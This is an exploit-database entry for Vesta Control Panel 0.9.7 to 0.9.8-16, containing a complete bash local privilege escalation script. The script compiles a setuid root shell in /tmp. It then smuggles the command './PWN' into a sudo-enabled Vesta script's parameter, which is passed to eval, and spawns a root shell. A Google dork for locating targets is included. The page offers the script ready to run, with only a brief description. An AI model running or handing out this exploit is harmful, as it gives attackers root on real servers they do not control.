Vesta Control Panel 0.9.8-16 - Local Privilege Escalation



EKU-ID: 6181 CVE: OSVDB-ID:
Author: Luka Pusic Published: 2016-12-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/bin/bash
#
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16
#
# Description:
# Vesta CP default install script adds /usr/local/vesta/bin/ directory into
# /etc/sudoers.d with the NOPASSWD option for the default "admin" user. All
# programs in /usr/local/vesta/bin/ directory can therefore be run as root. A
# command injection vulnerability in "v-get-web-domain-value" script can be
# exploited to run arbitrary commands and escalate from admin user to root.
#
# Vulnerability:
# Parameter $3 (key) in v-get-web-domain-value is not properly sanitized before
# being passed to bash eval.
#
#
 
# Navigate to a writeable directory, usually /tmp.
cd /tmp
 
# Write a simple C suid shell to suid.c.
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
 
# Compile suid shell with gcc.
# [!] If there is no gcc on the system deploy a precompiled binary manually.
gcc suid.c -o suid
 
# Create a shell script called PWN that will be run as root.
# PWN will weaponize ./suid with executable permissions and suid bit.
echo "chown root:root suid; chmod 777 suid; chmod +s suid;" > PWN
 
# Make PWN shell script executable.
chmod +x PWN
 
# Inject command to run PWN into v-get-web-domain-value parameter $3.
sudo /usr/local/vesta/bin/v-get-web-domain-value 'admin' 'domain.com' 'x; ./PWN;'
 
# Spawn the root shell.
./suid